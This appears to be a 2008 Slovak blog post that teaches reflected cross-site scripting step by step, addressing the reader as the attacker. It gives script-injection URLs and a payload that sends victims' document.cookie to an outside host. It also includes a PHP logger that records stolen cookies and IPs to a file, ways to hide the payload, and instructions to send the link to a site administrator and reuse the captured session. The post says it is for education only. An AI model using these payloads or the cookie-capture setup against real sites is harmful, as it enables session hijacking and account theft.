- Ako urobiť z linkov v code živé linky (pre Firefox a Operu)
- Volanie zadarmo cez zlatestranky.sk
- Zoznam freehostingov so subdomenami
- Vytvorenie CS 1.6 servera zdarma
- Free SMS cez internet
- Spider-Man: Web of Shadows
- Európski poslanci chcú chrániť deti pred zneužitím na internete
- Facebook hostuje až desať miliárd fotografií
- V USA majú nový anti-pirátsky zákon
- Apple odhalí nové MacBooky 14. októbra
Navigácia
XSS v praxi
Kedže už viete čo je to XSS rozhodol som sa napísať niečo o XSS útoku v praxy.Takže začíname s XSS útokom Ako prvé by bolo dobré nájsť web stránku ktorá používa vlastné vyhľadávanie. Ja som si jednu takú našiel: http://*****.sk/hladat.htm?slova=hladany+text Daný vyhľadávač vyhľadával ako ste sa na konci linku určite všimli dve slovíčka a to "hladaný" a "text". A teraz si povieme čo sa stane keď do políčka ktorý vyhľadávava slová na stránke neodolnej na XSS vložíme nejaký nami upravený text.
http://*****.sk/hladat.htm?slova=<script>alert('XSS');</script> http://upload-obrazkov.imghost.sk/files/sxqe6c6vdh6x1dec6cal.png
Využitie tejto zraniteľnosti Útočník [teda vy] môžete upraviť túto URL adresu napríklad aj takto
http://*****.sk/hladat.htm?slova=<script src="https://www.pcblog.sk/xss.js"></script> a takýmto spôsobom môže vykonať akýkoľvek javascript. Napríklad môže ukradnúť takzvaný „account hijacking“ vďaka ktorému sa môžete napríklad aj nalogovať do účtu admina / usera...
Ako sa dostane script k obeti ? Script v URL adrese sa dá zamaskovať viacerými spôsobmi 1.) Prevedením scriptu do Šestnástkovej sústavy. 2.) <img src="http://upload-obrazkov.imghost.sk/files/8xci9fce03wjo2c07l65.jpg" style= background:url(javascript:alert(123))> 3.) <a href="http://www.stranka.sk/hladat.php?najdi=<script> document.location.replace(' http://pcblog.sk/xss.php?cookie='+docum ent.cookie);</script>"<XSS XSS A XSS</a>
A teraz XSS PRAKTICKY
Ako prvé vyhľadáme stránku na ktorej útok chceme uskutočniť http://www.stranka-kde-zautocime.sk/email.php?&name=1&email=1&enquiry= <script>alert('xss');</script> Na našom serveri si vytvoríme súbor xss.php
<?php $f = fopen("cache.txt", "a"); fwrite($f,"IP:{$_SERVER['REMOTE_ADDR']} Cookie:{$HTTP_GET_VARS['c']}\n"); Ref:{$_SERVER['HTTP_REFERER']} fclose($f); ?>
Upravíme URL http://www.stranka-kde-zautocime.sk/email.php?&name=1&email=1&enquiry= <script>document.location=‘http://www.pcblog.sk/xss.php ?c=‘+document.cookie</script>
Script znova prevedieme do Šestnástkovej sústavy
Keď sme si už upravili link pošleme ho administrátorovi alebo užívateľovi stránky a počkáme si kým sa na našej stránke http://pcblog.sk/cache.txt zobrazí „cookie hijacking“ človeka [teda asi admina / usera], ktorému sme náš link odoslali.
Po získanie jeho cookie je treba získane informácie použiť. Na ich použitie nám poslúži rozšírenie pre Mozillu FireFox, ktoré sa volá Add N Edit Cookies.
Článok je len na náučné účely ! Cache.txt a XSS.php niesu na servri uložene ako to v článku uvádzam, ide len o príklad... p.s. Na začiatku stránky je cenzurovaný link, adminovi stranky som o chybe napísal, link je cenzúrovaný schválne.
God.Hell |
14. červenece 08, 10:07
Související články
- XSS: 1.cz (27. červenece 08, 19:07)
- Cross-site scrtipting (XSS) (15. červenece 08, 09:07)
- Európske vládne stránky a XSS (16. červenece 08, 23:07)
- XSS test #1: Zoznam.sk (20. červenece 08, 14:07)
- Bezpečnosť Slovenských webov [XSS] (19. červenece 08, 06:07)
- XSS test #2: Centrum.sk (21. červenece 08, 18:07)
- Prieskum náchylnosti stránok na XSS (16. červenece 08, 21:07)